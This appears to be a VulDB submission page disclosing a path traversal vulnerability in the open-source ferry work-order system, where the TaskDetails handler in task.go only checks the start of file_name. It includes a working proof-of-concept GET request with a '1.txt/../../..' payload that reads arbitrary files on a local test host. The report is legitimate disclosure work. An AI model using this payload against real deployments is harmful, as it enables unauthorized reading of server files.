Submit #50729: ferry work order system background arbitrary file readinginfo

Title	ferry work order system background arbitrary file reading
Description	Hello, I sent an authorized arbitrary file to read in the ferry system File address: https://github.com/lanyulei/ferry/blob/master/apis/process/task.go Accept file_name from GET request in TaskDetails function Judgment as follows -------------------------------------------------------------------------------------------------------- fileName == "" \|\| strings.HasPrefix(fileName, ".") \|\| strings.HasPrefix(fileName, "/") \|\| strings.HasPrefix(fileName, "\\") //it only verifies the beginning ----------------------------------------------------------------------------------------------------------- Judgment, this cannot avoid the occurrence of loopholes We can copy file_name as ls.txt/../../anyfile At this time, the system will return the file content to cause arbitrary file read vulnerability Here is what I reproduced locally I use golang1.16.15 to build in windows environment ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /api/v1/details?file_name=1.txt/../../../../../../../../../../../../test.txt HTTP/1.1 Host: 127.0.0.1:8002 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: http://127.0.0.1:8002/ Accept-Encoding: gzip, deflate Cookie: Hm_lvt_1d2d61263f13e4b288c8da19ad3ff56d=1667456630; Hm_lpvt_1d2d61263f13e4b288c8da19ad3ff56d=1667456630 Connection: close ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- My test.txt file is in the root directory of the E drive, at this point I can read it project address：https://github.com/lanyulei/ferry Thanks for your review
User	qsec (UID 33968)
Submission	11/03/2022 09:33 (4 years ago)
Moderation	11/11/2022 07:56 (8 days later)
Status	Accepted
VulDB entry	213447 [lanyulei ferry apis/process/task.go file_name path traversal]
Points	17

◂ Previous Overview Next ▸

Interested in the pricing of exploits?

See the underground prices here!